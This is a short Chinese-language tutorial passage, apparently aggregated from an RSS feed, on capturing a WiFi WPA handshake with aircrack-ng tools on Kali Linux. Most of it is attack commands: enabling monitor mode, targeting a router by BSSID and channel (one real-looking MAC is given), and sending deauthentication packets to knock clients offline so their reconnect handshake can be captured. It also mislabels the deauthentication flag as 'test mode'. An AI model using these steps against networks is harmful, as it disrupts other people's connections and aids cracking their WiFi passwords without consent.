


























iwconfig
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon
关键参数解析:
BSSID:目标路由器的 MAC 地址。
CH:信号所在的物理信道。
STATION:下方列表中连接该 WiFi 的设备 MAC(重点:必须有客户端在线才能抓包)。
airodump-ng --channel [信道] --bssid [目标的BSSID] -w [文件名] wlan0mon
airodump-ng --channel 13 --bssid 10:04:C1:02:F8:7C -w /home/kali/Desktop/wifi/ wlan0mon
如果一直等不到客户端重连,我们需要主动出击。通过发送 反认证包 强制客户端掉线,在其自动重连的一瞬间抓取加密的握手信息。
保持抓包窗口运行,新开终端: -0 表示测试模式,5 表示发送包的数量
aireplay-ng -0 5 -a [路由器BSSID] -c [客户端MAC] wlan0mon
airmon-ng stop wlan0mon
systemctl restart NetworkManager
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。